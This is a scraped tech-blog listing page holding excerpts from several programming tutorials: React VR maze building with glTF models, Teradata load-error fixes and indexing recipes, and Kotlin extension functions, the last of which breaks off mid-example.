like hedges (did you notice this in my preceding code? If so, I did this on purpose as a learning experience. Honest). This is an easy fix. Make sure that you code import Floor from './floor.js'; note that Floor not type-checked. (It is, after all, JavaScript.) I thought this was odd, as the hedge.js file exports a Hedge object, not a Floor object, but be aware you can rename the objects as you import them. The second problem I had was more of a simple goof that is easy to occur if you aren't really thinking in React. You may run into this. JavaScript is a lovely language, but sometimes I miss a strongly typed language. Here is what I did: <Maze SizeX='4' SizeZ='4' CellSpacing='2.1' Seed='7' /> Inside the maze.js file, I had code like this: for (var j = 0; j < this.props.SizeX + 2; j++) { After some debugging, I found out that the value of j was going from 0 to 42. Why did it get 42 instead of 6? The reason was simple. We need to fully understand JavaScript to program complex apps. The mistake was in initializing SizeX to be '4' ; this makes it a string variable. When calculating j from 0 (an integer), React/JavaScript takes 2, adds it to a string of '4', and gets the 42 string, then converts it to an integer and assigns this to j. When this is done, very weird things happened. When we were building the Space Gallery, we could easily use the '5.1' values for the input to the box: <Pedestal MyX='0.0' MyZ='-5.1'/> Then, later use the transform statement below inside the class: transform: [ { translate: [ this.props.MyX, -1.7, this.props.MyZ] } ] React/JavaScript will put the string values into This.Props.MyX, then realize it needs an integer, and then quietly do the conversion. However, when you get more complicated objects, such as our Maze generation, you won't get away with this. Remember that your code isn't "really" JavaScript. It's processed. At the heart, this processing is fairly simple, but the implications can be a killer. Pay attention to what you code. With a loosely typed language such as JavaScript, with React on top, any mistakes you make will be quietly converted to something you didn't intend. You are the programmer. Program correctly. So, back to the Maze. The Hedge and Floor are straightforward copies of the initial Gem code. Let's take a look at our starting Gem, although note it gets a lot more complicated later (and in your source files): import React, { Component } from 'react'; import { asset, Box, Model, Text, View } from 'react-vr'; export default class Gem extends Component { constructor() { super(); this.state = { Height: -3 }; } render() { return ( <Model source={{ gltf2: asset('TeleportGem.gltf'), }} style={{ transform: [{ translate: [this.props.X, this.state.Height, this.props.Z] }] }} /> ); } } The Hedge and Floor are essentially the same thing. (We could have made a prop be the file loaded, but we want a different behavior for the Gem, so we will edit this file extensively.) To run this sample, first, we should have created a directory as you have before, called WalkInAMaze. Once you do this, download the files from the Git source for this part of the article (http://bit.ly/VR_Chap11). Once you've created the app, copied the files, and fired it up, (go to the WalkInAMaze directory and type npm start), and you should see something like this once you look around - except, there is a bug. This is what the maze should look like (if you use the file  'MazeHedges2DoubleSided.gltf' in Hedge.js, in the <Model> statement):> Now, how did we get those neat-looking hedges in the game? (OK, they are pretty low poly, but it is still pushing it.) One of the nice things about the pace of improvement on web standards is their new features. Instead of just .obj file format, React VR now has the capability to load glTF files. Using the glTF file format for models glTF files are a new file format that works pretty naturally with WebGL. There are exporters for many different CAD packages. The reason I like glTF files is that getting a proper export is fairly straightforward. Lightwave OBJ files are an industry standard, but in the case of React, not all of the options are imported. One major one is transparency. The OBJ file format allows that, but at of the time of writing this book, it wasn't an option. Many other graphics shaders that modern hardware can handle can't be described with the OBJ file format. This is why glTF files are the next best alternative for WebVR. It is a modern and evolving format, and work is being done to enhance the capabilities and make a fairly good match between what WebGL can display and what glTF can export. This is however on interacting with the world, so I'll give a brief mention on how to export glTF files and provide the objects, especially the Hedge, as glTF models. The nice thing with glTF from the modeling side is that if you use their material specifications, for example, for Blender, then you don't have to worry that the export won't be quite right. Today's physically Based Rendering (PBR) tends to use the metallic/roughness model, and these import better than trying to figure out how to convert PBR materials into the OBJ file's specular lighting model. Here is the metallic-looking Gem that I'm using as the gaze point: Using the glTF Metallic Roughness model, we can assign the texture maps that programs, such as Substance Designer, calculate and import easily. The resulting figures look metallic where they are supposed to be metallic and dull where the paint still holds on. I didn't use Ambient Occlusion here, as this is a very convex model; something with more surface depressions would look fantastic with Ambient Occlusion. It would also look great with architectural models, for example, furniture. To convert your models, there is user documentation at http://bit.ly/glTFExporting. You will need to download and install the Blender glTF exporter. Or, you can just download the files I have already converted. If you do the export, in brief, you do the following steps: Download the files from http://bit.ly/gLTFFiles. You will need the gltf2_Principled.blend file, assuming that you are on a newer version of Blender. In Blender, open your file, then link to the new materials. Go to File->Link, then choose the gltf2_Principled.blend file. Once you do that, drill into "NodeTree" and choose either glTF Metallic Roughness (for metal), or glTF specular glossiness for other materials. Choose the object you are going to export; make sure that you choose the Cycles renderer. Open the Node Editor in a window. Scroll down to the bottom of the Node Editor window, and make sure that the box Use Nodes is checked. Add the node via the nodal menu, Add->Group->glTF Specular Glossiness or Metallic Roughness. Once the node is added, go to Add->Texture->Image texture. Add as many image textures as you have image maps, then wire them up. You should end up with something similar to this diagram. To export the models, I recommend that you disable camera export and combine the buffers unless you think you will be exporting several models that share geometry or materials. The Export options I used are as follows: Now, to include the exported glTF object, use the <Model> component as you would with an OBJ file, except you have no MTL file. The materials are all described inside the .glTF file. To include the exported glTF object, you just put the filename as a gltf2 prop in the <Model: <Model source={{ gltf2: asset('TeleportGem2.gltf'),}} ... To find out more about these options and processes, you can go to the glTF export web site. This site also includes tutorials on major CAD packages and the all-important glTF shaders (for example, the Blender model I showed earlier). I have loaded several .OBJ files and .glTF files so you can experiment with different combinations of low poly and transparency. When glTF support was added in React VR version 2.0.0, I was very excited as transparency maps are very important for a lot of VR models, especially vegetation; just like our hedges. However, it turns out there is a bug in WebGL or three.js that does not render the transparency properly. As a result, I have gone with a low polygon version in the files on the GitHub site; the pictures, above, were with the file MazeHedges2DoubleSided.gltf in the Hedges.js file (in vr/components). If you get 404 errors, check the paths in the glTF file. It depends on which exporter you use—if you are working with Blender, the gltf2 exporter from the Khronos group calculates the path correctly, but the one from Kupoman has options, and you could export the wrong paths. We discussed important mechanics of props, state, and events. We also discussed how to create a maze using pseudo-random number generators to make sure that our props and state didn't change chaotically. To know more about how to create, move around in, and make worlds react to us in a Virtual Reality world, including basic teleport mechanics, do check out this book Getting Started with React VR.  Read More: Google Daydream powered Lenovo Mirage solo hits the market Google open sources Seurat to bring high precision graphics to Mobile VR Oculus Go, the first stand alone VR headset arrives!
Read more
  • 0
  • 0
  • 30794

article-image-how-to-prevent-errors-while-using-utilities-for-loading-data-in-teradata
Pravin Dhandre
11 Jun 2018
9 min read
Save for later

How to prevent errors while using utilities for loading data in Teradata

Pravin Dhandre
11 Jun 2018
9 min read
In today’s tutorial we will assist you to overcome the errors that arise while loading, deleting or updating large volumes of data using Teradata Utilities. [box type="note" align="" class="" width=""]This article is an excerpt from Teradata Cookbook co-authored by Abhinav Khandelwal and Rajsekhar Bhamidipati. This book provides recipes to simplify the daily tasks performed by database administrators (DBA) along with providing efficient data warehousing solutions in Teradata database system.[/box] Resolving FastLoad error 2652 When data is being loaded via FastLoad, a table lock is placed on the target table. This means that the table is unavailable for any other operation. A lock on a table is only released when FastLoad encounters the END LOADING command, which terminates phase 2, the so-called application phase. FastLoad may get terminated in phase 1 due to any of the following reasons: Load script results in failure (error code 8 or 12) Load script is aborted by admin or some other session FastLoad fails due to bad record or file Forgetting to add end loading statement in script If so, it keeps a lock on the table, which needs to be released manually. In this recipe, we will see the steps to release FastLoad locks. Getting ready Identify the table on which FastLoad is been ended prematurely and tables are in locked state. You need to have valid credentials for the Teradata Database. Execute the dummy FastLoad script from the same user or the user which has write access to the lock table. A user requires the following privileges/rights in order to execute the FastLoad: SELECT and INSERT (CREATE and DROP or DELETE) access to the target or loading table CREATE and DROP TABLE on error tables SELECT, INSERT, UPDATE, and DELETE are required privileges for the user PUBLIC on the restart log table (SYSADMIN.FASTLOG). There will be a row in the FASTLOG table for each FastLoad job that has not completed in the system. How to do it... Open a notepad and create the following script: .LOGON 127.0.0.1/dbc, dbc; /* Vaild system name and credentials to your system */ .DATABASE Database_Name; /* database under which locked table is */ erorfiles errortable_name, uv_tablename /* same error table name as in script */ begin loading locked_table; /* table which is getting 2652 error */ .END LOADING; /* to end pahse 2 and release the lock */ .LOGOFF; Save it as dummy_fl.txt. Open the windows Command Prompt and execute this using the FastLoad command, as shown in the following screenshot: This dummy script with no insert statement should release the lock on the target Table. Execute Select on the locked table to see if the lock is released on the table. How it works... As FastLoad is designed to work only on empty tables, it becomes necessary that the loading of the table finishes in one go. If the load script is errored out prematurely in phase 2, without encountering the END loading command, it leaves a lock on loading the table. Fastload locks can't be released via the HUT utility, as there are no technical lock on the table. To execute FastLoad, the following are some requirements: Log table: FastLoad puts its progress information in the fastlog table. EMPTY TABLE: FastLoad needs the table to be empty before inserting rows into that table. TWO ERROR TABLES: FastLoad requires two error tables to be created; you just need to name them, and no ddl is required. The first error table records any translation or constraint violation error, whereas the second error table captures errors related to the duplication of values for Unique Primary Indexes (UPI). After the completion of FastLoad, you can analyze these error tables as to why the records got rejected. There's more... If this does not fix the issue, you need to drop the target table and error tables associated with it. Before proceeding with dropping tables, check with the administrator to abort any FastLoad sessions associated with this table. Resolving MLOAD error 2571 MLOAD works in five phases, unlike FastLoad, which only works in two phases. MLOAD can fail in either phase three or four. Figure shows 5 stages of MLOAD. Preliminary: Basic setup. Syntax checking, establishing session with the Teradata Database, creation of error tables (two error tables per target table), and the creation of work tables and log tables are done in this phase. DML Transaction phase: Request is parse through PE and a step plan is generated. Steps and DML are then sent to AMP and stored in appropriate work tables for each target table. Input data sent will be stored in these work tables, which will be applied to the target table later on. Acquisition phase: Unsorted data is sent to AMP in blocks of 64K. Rows are hashed by PI and sent to appropriate AMPs. Utility places locks on target tables in preparation for the application phase to apply rows in target tables. Application phase: Changes are applied to target tables and NUSI subtables. Lock on table is held in this phase. Cleanup phase: If the error code of all the steps is 0, MLOAD successfully completes and releases all the locks on the specified table. This being the case, all empty error tables, worktables, and the log table are dropped. Getting ready Identify the table which is getting affected by error 2571. Make sure no host utility is running on this table and the load job is in a failed state for this table. How to do it... Check on viewpoint for any active utility job for this table. If you find any active job, let it complete. If there is a reason that you need to release the lock, first abort all the sessions of the host utility from viewpoint. Ask your administrator to do it. Execute the following command: RELEASE MLOAD <databasename.tablename>; > If you get a Not able to release MLOAD Lock error, execute the following Command: /* Release lock in application phase */ RELEASE MLOAD <databasename.tablename> in apply; Once the locks are released you need to drop all the associated error tables, the log table, and work tables with it. Re-execute MLOAD after correcting the error. How it works... The Mload utility places a lock in table headers to alert other utilities that a MultiLoad is in session for this table. They include: Acquisition lock: DML allows all DDL allows DROP only Application lock: DML allows SELECT with ACCESS only DDL allows DROP only There's more... If the release lock statement still gives an error and does not release the lock on the table, you need to use SELECT with the ACCESS lock to copy the content of the locked table to a new one and drop the locked tables. If you start receiving the error 7446 Mload table %ID cannot be released because NUSI exists, you need to drop all the NUSI on the table and use ALTER Table to nonfallback to accomplish the task. Resolving failure 7547 This error is associated with the UPDATE statement, which could be SQL based or could be in MLOAD. Various times, while updating the set of rows in a table, the update fails on Failure 7547 Target row updated by multiple source rows. This error will happen when you update the target with multiple rows from the source. This means there are duplicated values present in the source tables. Getting ready Let's create sample volatile tables and insert values into them. After that, we will execute the UPDATE command, which will fail to result in 7547: Create a TARGET TABLE with the following DDL and insert values into it: ** TARGET TABLE** create volatile table accounts ( CUST_ID, CUST_NAME, Sal )with data primary index(cust_id) insert values (1,'will',2000); insert values (2,'bekky',2800); insert values (3,'himesh',4000); Create a SOURCE TABLE with the following DDL and insert values into it: ** SOURCE TABLE** create volatile table Hr_payhike ( CUST_ID, CUST_NAME, Sal_hike ) with data primary index(cust_id) insert values (1,'will',2030); insert values (1,'bekky',3800); insert values (3,'himesh',7000); Execute the MLOAD script. Following the snippet from the MLOAD script, only update part (which will fail): /* Snippet from MLOAD update */ UPDATE ACC FROM ACCOUNTS ACC , Hr_payhike SUPD SET Sal= TUPD.Sal_hike WHERE Acc.CUST_ID = SUPD.CUST_ID; Failure: Target row updated by multiple source rows How to do it... Check for duplicate values in the source table using the following: /*Check for duplicate values in source table*/ SELECT cust_id,count(*) from Hr_payhike group by 1 order by 2 desc The output will be generated with CUST_ID =1 and has two values which are causing errors. The reason for this is that while updating the TARGET table, the optimizer won't be able to understand from which row it should update the TARGET row. Who's salary will be updated Will or Bekky? To resolve the error, execute the following update query: /* Update part of MLOAD */ UPDATE ACC FROM ACCOUNTS ACC , ( SELECT CUST_ID, CUST_NAME, SAL_HIKE FROM Hr_payhike QUALIFY ROW_NUMBER() OVER (PARTITION BY CUST_ID ORDER BY CUST_NAME,SAL_HIKE DESC)=1) SUPD SET Sal= SUPD.Sal_hike WHERE Acc.CUST_ID = SUPD.CUST_ID; Now, the update will run without error. How it works... Failure will happen when you update the target with multiple rows from the source. If you defined a primary index column for your target, and if those columns are in an update query condition, this error will occur. To further resolve this, you can delete the duplicate from the source table itself and execute the original update without any modification. But if the source data can't be changed, then you need to change the update statement. To summarize, we have successfully learned how to overcome or prevent errors while using utilities for loading data into database. You could also check out the Teradata Cookbook  for more than 100 recipes on enterprise data warehousing solutions. 2018 is the year of graph databases. Here’s why. 6 reasons to choose MySQL 8 for designing database solutions Amazon Neptune, AWS’ cloud graph database, is now generally available
Read more
  • 0
  • 0
  • 18203

article-image-3-ways-to-use-indexes-in-teradata-to-improve-database-performance
Pravin Dhandre
11 Jun 2018
15 min read
Save for later

3 ways to use Indexes in Teradata to improve database performance

Pravin Dhandre
11 Jun 2018
15 min read
In this tutorial, we will create solutions to design indexes to help us improve query performance of Teradata database management system. [box type="note" align="" class="" width=""]This article is an excerpt from a book co-authored by Abhinav Khandelwal and Rajsekhar Bhamidipati titled Teradata Cookbook. This book will teach you to tackle problems related to efficient querying, stored procedure searching, and navigation techniques in a Teradata database.[/box] Creating a partitioned primary index to improve performance A PPI (partitioned primary index) is a type of index that enables users to set up databases that provide performance benefits from a data locality, while retaining the benefits of scalability inherent in the hash architecture of the Teradata database. This is achieved by hashing rows to different virtual AMPs, as is done with a normal PI, but also by creating local partitions within each virtual AMP. We will see how PPIs will improve the performance of a query. Getting ready You need to connect to the Teradata database. Let's create a table and insert data into it using the following DDL. This will be a non-partitioned table, as follows: /*NON PPI TABLE DDL*/ CREATE volatile TABLE EMP_SAL_NONPPI ( id INT, Sal INT, dob DATE, o_total INT ) primary index( id)   on commit preserve rows; INSERT into EMP_SAL_NONPPI VALUES (1001,2500,'2017-09-01',890); INSERT into EMP_SAL_NONPPI VALUES (1002,5500,'2017-09-10',890); INSERT into EMP_SAL_NONPPI VALUES (1003,500,'2017-09-02',890); INSERT into EMP_SAL_NONPPI VALUES (1004,54500,'2017-09-05',890); INSERT into EMP_SAL_NONPPI VALUES (1005,900,'2017-09-23',890); INSERT into EMP_SAL_NONPPI VALUES (1006,8900,'2017-08-03',890); INSERT into EMP_SAL_NONPPI VALUES (1007,8200,'2017-08-21',890); INSERT into EMP_SAL_NONPPI VALUES (1008,6200,'2017-08-06',890); INSERT into EMP_SAL_NONPPI VALUES (1009,2300,'2017-08-12',890); INSERT into EMP_SAL_NONPPI VALUES (1010,9200,'2017-08-15',890); Let's check the explain plan of the following query; we are selecting data based on the DOB column using the following code: /*Select on NONPPI table*/ SELECT * from EMP_SAL_NONPPI where dob <= 2017-08-01 Following is the snippet from SQLA showing explain plan of the query: As seen in the following explain plan, an all-rows scan can be costly in terms of CPU and I/O if the table has millions of rows: Explain SELECT * from EMP_SAL_NONPPI where dob <= 2017-08-01; /*EXPLAIN PLAN of SELECT*/ 1) First, we do an all-AMPs RETRIEVE step from DBC.EMP_SAL_NONPPI by way of an all-rows scan with a condition of ("DBC.EMP_SAL_NONPPI.dob <= DATE '1900-12-31'") into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with no confidence to be 4 rows (148 bytes). The estimated time for this step is 0.04 seconds. 2) Finally, we send out an END TRANSACTION step to all AMPs involved in processing the request. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. Let's see how we can enable partition retrieval in the same query. How to do it... Connect to the Teradata database using SQLA or Studio. Create the following table with the data. We will define a PPI on the column DOB: /*Partition table*/ CREATE volatile TABLE EMP_SAL_PPI ( id INT, Sal int, dob date, o_total int ) primary index( id) PARTITION BY RANGE_N (dob BETWEEN DATE '2017-01-01' AND DATE '2017-12-01' EACH INTERVAL '1' DAY) on commit preserve rows; INSERT into EMP_SAL_PPI VALUES (1001,2500,'2017-09-01',890); INSERT into EMP_SAL_PPI VALUES (1002,5500,'2017-09-10',890); INSERT into EMP_SAL_PPI VALUES (1003,500,'2017-09-02',890); INSERT into EMP_SAL_PPI VALUES (1004,54500,'2017-09-05',890); INSERT into EMP_SAL_PPI VALUES (1005,900,'2017-09-23',890); INSERT into EMP_SAL_PPI VALUES (1006,8900,'2017-08-03',890); INSERT into EMP_SAL_PPI VALUES (1007,8200,'2017-08-21',890); INSERT into EMP_SAL_PPI VALUES (1008,6200,'2017-08-06',890); INSERT into EMP_SAL_PPI VALUES (1009,2300,'2017-08-12',890); INSERT into EMP_SAL_PPI VALUES (1010,9200,'2017-08-15',890); Let's execute the same query on a new partition table: /*SELECT on PPI table*/ sel * from EMP_SAL_PPI where dob <= 2017-08-01 Following snippet from SQLA shows query and explain plan of the query: The data is being accessed using only a single partition, as shown in the following block: /*EXPLAIN PLAN*/ 1) First, we do an all-AMPs RETRIEVE step from a single partition of SYSDBA.EMP_SAL_PPI with a condition of ("SYSDBA.EMP_SAL_PPI.dob = DATE '2017-08-01'") with a residual condition of ( "SYSDBA.EMP_SAL_PPI.dob = DATE '2017-08-01'") into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with no confidence to be 1 row (37 bytes). The estimated time for this step is 0.04 seconds. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. How it works... A partitioned PI helps in improving the performance of a query by avoiding a full table scan elimination. A PPI works the same as a primary index for data distribution, but creates partitions according to ranges or cases, as specified in the table. There are four types of PPI that can be created in a table: Case partitioning: /*CASE partition*/ CREATE TABLE SALES_CASEPPI ( ORDER_ID INTEGER, CUST_ID INTERGER, ORDER_DT DATE, ) PRIMARY INDEX(ORDER_ID) PARTITION BY CASE_N(ORDER_ID < 101, ORDER_ ID < 201, ORDER_ID < 501, NO CASE,UNKNOWN); Range-based partitioning: /*Range Partition table*/ CREATE volatile TABLE EMP_SAL_PPI ( id INT, Sal int, dob date, o_total int ) primary index( id) PARTITION BY RANGE_N (dob BETWEEN DATE '2017-01-01' AND DATE '2017-12-01' EACH INTERVAL '1' DAY) on commit preserve rows Multi-level partitioning: CREATE TABLE SALES_MLPPI_TABLE ( ORDER_ID INTEGER NOT NULL, CUST_ID INTERGER, ORDER_DT DATE, ) PRIMARY INDEX(ORDER_ID) PARTITION BY (RANGE_N(ORDER_DT BETWEEN DATE '2017-08-01' AND DATE '2017-12-31' EACH INTERVAL '1' DAY) CASE_N (ORDER_ID < 1001, ORDER_ID < 2001, ORDER_ID < 3001, NO CASE, UNKNOWN)); Character-based partitioning: /*CHAR Partition*/ CREATE TABLE SALES_CHAR_PPI ( ORDR_ID INTEGER, EMP_NAME VARCHAR (30) CHARACTER, PRIMARY INDEX (ORDR_ID) PARTITION BY CASE_N ( EMP_NAME LIKE 'A%', EMP_NAME LIKE 'B%', EMP_NAME LIKE 'C%', EMP_NAME LIKE 'D%', EMP_NAME LIKE 'E%', EMP_NAME LIKE 'F%', NO CASE, UNKNOWN); PPI not only helps in improving the performance of queries, but also helps in table maintenance. But there are certain performance considerations that you might need to keep in mind when creating a PPI on a table, and they are: If partition column criteria is not present in the WHERE clause while selecting primary indexes, it can slow the query The partitioning of the column must be carefully chosen in order to gain maximum benefits Drop unneeded secondary indexes or value-ordered join indexes Creating a join index to improve performance A join index is a data structure that contains data from one or more tables, with or without aggregation: In this, we will see how join indexes help in improving the performance of queries. Getting ready You need to connect to the Teradata database using SQLA or Studio. Let's create a table and insert the following code into it: CREATE TABLE td_cookbook.EMP_SAL ( id INT, DEPT varchar(25), emp_Fname varchar(25), emp_Lname varchar(25), emp_Mname varchar(25), status INT )primary index(id); INSERT into td_cookbook.EMP_SAL VALUES (1,'HR','Anikta','lal','kumar',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Anik','kumar','kumar',2); INSERT into td_cookbook.EMP_SAL VALUES (3,'IT','Arjun','sharma','lal',1); INSERT into td_cookbook.EMP_SAL VALUES (4,'SALES','Billa','Suti','raj',2); INSERT into td_cookbook.EMP_SAL VALUES (4,'IT','Koyd','Loud','harlod',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Harlod','lal','kumar',1); Further, we will create a single table join index with a different primary index of the table. How to do it... The following are the steps to create a join index to improve performance: Connect to the Teradata database using SQLA or Studio. Check the explain plan for the following query: /*SELECT on base table*/ EXPLAIN SELECT id,dept,emp_Fname,emp_Lname,status from td_cookbook.EMP_SAL where id=4; 1) First, we do a single-AMP RETRIEVE step from td_cookbook.EMP_SAL by way of the primary index "td_cookbook.EMP_SAL.id = 4" with no residual conditions into Spool 1 (one-amp), which is built locally on that AMP. The size of Spool 1 is estimated with low confidence to be 2 rows (118 bytes). The estimated time for this step is 0.02 seconds. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.02 seconds. Query with a WHERE clause on id; then the system will query the EMP table using the primary index of the base table, which is id. Now, if a user wants to query a table on column emp_Fname, an all row scan will occur, which will degrade the performance of the query, as shown in the following screenshot: Now, we will create a JOIN INDEX using emp_Fname as the primary index: /*Join Index*/ CREATE JOIN INDEX td_cookbook.EMP_JI AS SELECT id,emp_Fname,emp_Lname,status,emp_Mname,dept FROM td_cookbook.EMP_SAL PRIMARY INDEX(emp_Fname); Let's collect statistics on the join index: /*Collect stats on JI*/ collect stats td_cookbook.EMP_JI column emp_Fname Now, we will check the explain plan query on the WHERE clause using the column emp_Fname: Explain sel id,dept,emp_Fname,emp_Lname,status from td_cookbook.EMP_SAL where emp_Fname='ankita'; 1) First, we do a single-AMP RETRIEVE step from td_cookbooK.EMP_JI by way of the primary index "td_cookbooK.EMP_JI.emp_Fname = 'ankita'" with no residual conditions into Spool 1 (one-amp), which is built locally on that AMP. The size of Spool 1 is estimated with low confidence to be 2 rows (118 bytes). The estimated time for this step is 0.02 seconds. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.02 seconds. In EXPLAIN, you can see that the optimizer is using the join index instead of the base table when the table queries are using the Emp_Fname column. How it works... Query performance improves any time a join index can be used instead of the base tables. A join index is most useful when its columns can satisfy, or cover, most or all of the requirements in a query. For example, the optimizer may consider using a covering index instead of performing a merge join. When we are able to cover all the queried columns that can be satisfied by a join index, then it is called a cover query. Covering indexes improve the speed of join queries. The extent of improvement can be dramatic, especially for queries involving complex, large-table, and multiple-table joins. The extent of such improvement depends on how often an index is appropriate to a query. There are a few more join indexes that can be used in Teradata: Aggregate-table join index: A type of join index which pre-joins and summarizes aggregated tables without requiring any physical summary tables. It refreshes automatically whenever the base table changes. Only COUNT and SUM are permitted, and DISTINCT is not permitted: /*AG JOIN INDEX*/ CREATE JOIN INDEX Agg_Join_Index AS SELECT Cust_ID, Order_ID, SUM(Sales_north) -- Aggregate column FROM sales_table GROUP BY 1,2 Primary Index(Cust_ID) Use FLOAT as a data type for COUNT and SUM to avoid overflow. Sparse join index: When a WHERE clause is applied in a JOIN INDEX, it is know as a sparse join index. By limiting the number of rows retrieved in a join, it reduces the size of the join index. It is also useful for UPDATE statements where the index is highly selective: /*SP JOIN INDEX*/ CREATE JOIN INDEX Sparse_Join_Index AS SELECT Cust_ID, Order_ID, SUM(Sales_north) -- Aggregate column FROM sales_table where Order_id = 1 -- WHERE CLAUSE GROUP BY 1,2 Primary Index(Cust_ID) Creating a hash index to improve performance Hash indexes are designed to improve query performance like join indexes, especially single table join indexes, and in addition, they enable you to avoid accessing the base table. The syntax for the hash index is as follows: /*Hash index syntax*/ CREATE HASH INDEX <hash-index-name> [, <fallback-option>] (<column-name-list1>) ON <base-table> [BY (<partition-column-name-list2>)] [ORDER BY <index-sort-spec>] ; Getting ready You need to connect to the Teradata database. Let's create a table and insert data into it using the following DDL: /*Create table with data*/ CREATE TABLE td_cookbook.EMP_SAL ( id INT, DEPT varchar(25), emp_Fname varchar(25), emp_Lname varchar(25), emp_Mname varchar(25), status INT )primary index(id); INSERT into td_cookbook.EMP_SAL VALUES (1,'HR','Anikta','lal','kumar',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Anik','kumar','kumar',2); INSERT into td_cookbook.EMP_SAL VALUES (3,'IT','Arjun','sharma','lal',1); INSERT into td_cookbook.EMP_SAL VALUES (4,'SALES','Billa','Suti','raj',2); INSERT into td_cookbook.EMP_SAL VALUES (4,'IT','Koyd','Loud','harlod',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Harlod','lal','kumar',1); How to do it... You need to connect to the Teradata database using SQLA or Studio. Let's check the explain plan of the following query shown in the figure: /*EXPLAIN of SELECT*/ Explain sel id,emp_Fname from td_cookbook.EMP_SAL; 1) First, we lock td_cookbook.EMP_SAL for read on a reserved RowHash to prevent global deadlock. 2) Next, we lock td_cookbook.EMP_SAL for read. 3) We do an all-AMPs RETRIEVE step from td_cookbook.EMP_SAL by way of an all-rows scan with no residual conditions into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with high confidence to be 6 rows (210 bytes). The estimated time for this step is 0.04 seconds. 4) Finally, we send out an END TRANSACTION step to all AMPs involved in processing the request. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. Now let's create a hash join index on the EMP_SAL table: /*Hash Indx*/ CREATE HASH INDEX td_cookbook.EMP_HASH_inx (id, DEPT) ON td_cookbook.EMP_SAL BY (id) ORDER BY HASH (id); Let's now check the explain plan on the select query after the hash index creation: /*Select after hash idx*/ EXPLAIN SELCT id,dept from td_cookbook.EMP_SAL 1) First, we lock td_cookbooK.EMP_HASH_INX for read on a reserved RowHash to prevent global deadlock. 2) Next, we lock td_cookbooK.EMP_HASH_INX for read. 3) We do an all-AMPs RETRIEVE step from td_cookbooK.EMP_HASH_INX by way of an all-rows scan with no residual conditions into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with high confidence to be 6 rows (210 bytes). The estimated time for this step is 0.04 seconds. 4) Finally, we send out an END TRANSACTION step to all AMPs involved in processing the request. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. Explain plan can be see in the snippet from SQLA: How it works... Points to consider about the hash index definition are: Each hash index row contains the department id and the department name. Specifying the department id is unnecessary, since it is the primary index of the base table and will therefore be automatically included. The BY clause indicates that the rows of this index will be distributed by the department id hash value. The ORDER BY clause indicates that the index rows will be ordered on each AMP in sequence by the department id hash value. The column specified in the BY clause should be part of the columns which make up the hash index. The BY clause comes with the ORDER BY clause. Unlike join indexes, hash indexes can only be on a single table. We explored how to create different types of index to bring up maximum performance in your database queries. If this article made your way, do check out the book Teradata Cookbook and gain confidence in running a wide variety of Data analytics to develop applications for the Teradata environment. Why MongoDB is the most popular NoSQL database today Why Oracle is losing the Database Race Using the Firebase Real-Time Database  
Read more
  • 0
  • 0
  • 20332
article-image-extension-functions-in-kotlin
Aaron Lazar
08 Jun 2018
8 min read
Save for later

Extension functions in Kotlin: everything you need to know

Aaron Lazar
08 Jun 2018
8 min read
Kotlin is a rapidly rising programming language. It offers developers the simplicity and effectiveness to develop robust and lightweight applications. Kotlin offers great functional programming support, and one of the best features of Kotlin in this respect are extension functions, hands down! Extension functions are great, because they let you modify existing types with new functions. This is especially useful when you're working with Android and you want to add extra functions to the framework classes. In this article, we'll see what Extension functions are and how the're a blessing in disguise! This article has been extracted from the book, Functional Kotlin, by Mario Arias and Rivu Chakraborty. The book bridges the language gap for Kotlin developers by showing you how to create and consume functional constructs in Kotlin. fun String.sendToConsole() = println(this) fun main(args: Array<String>) { "Hello world! (from an extension function)".sendToConsole() } To add an extension function to an existing type, you must write the function's name next to the type's name, joined by a dot (.). In our example, we add an extension function (sendToConsole()) to the String type. Inside the function's body, this refers the instance of String type (in this extension function, string is the receiver type). Apart from the dot (.) and this, extension functions have the same syntax rules and features as a normal function. Indeed, behind the scenes, an extension function is a normal function whose first parameter is a value of the receiver type. So, our sendToConsole() extension function is equivalent to the next code: fun sendToConsole(string: String) = println(string) sendToConsole("Hello world! (from a normal function)") So, in reality, we aren't modifying a type with new functions. Extension functions are a very elegant way to write utility functions, easy to write, very fun to use, and nice to read—a win-win. This also means that extension functions have one restriction—they can't access private members of this, in contrast with a proper member function that can access everything inside the instance: class Human(private val name: String) fun Human.speak(): String = "${this.name} makes a noise" //Cannot access 'name': it is private in 'Human' Invoking an extension function is the same as a normal function—with an instance of the receiver type (that will be referenced as this inside the extension), invoke the function by name. Extension functions and inheritance There is a big difference between member functions and extension functions when we talk about inheritance. The open class Canine has a subclass, Dog. A standalone function, printSpeak, receives a parameter of type Canine and prints the content of the result of the function speak(): String: open class Canine { open fun speak() = "<generic canine noise>" } class Dog : Canine() { override fun speak() = "woof!!" } fun printSpeak(canine: Canine) { println(canine.speak()) } Open classes with open methods (member functions) can be extended and alter their behavior. Invoking the speak function will act differently depending on which type is your instance. The printSpeak function can be invoked with any instance of a class that is-a Canine, either Canine itself or any subclass: printSpeak(Canine()) printSpeak(Dog()) If we execute this code, we can see this on the console: Although both are Canine, the behavior of speak is different in both cases, as the subclass overrides the parent implementation. But with extension functions, many things are different. As with the previous example, Feline is an open class extended by the Cat class. But speak is now an extension function: open class Feline fun Feline.speak() = "<generic feline noise>" class Cat : Feline() fun Cat.speak() = "meow!!" fun printSpeak(feline: Feline) { println(feline.speak()) } Extension functions don't need to be marked as override, because we aren't overriding anything: printSpeak(Feline()) printSpeak(Cat() If we execute this code, we can see this on the console: In this case, both invocations produce the same result. Although in the beginning, it seems confusing, once you analyze what is happening, it becomes clear. We're invoking the Feline.speak() function twice; this is because each parameter that we pass is a Feline to the printSpeak(Feline) function: open class Primate(val name: String) fun Primate.speak() = "$name: 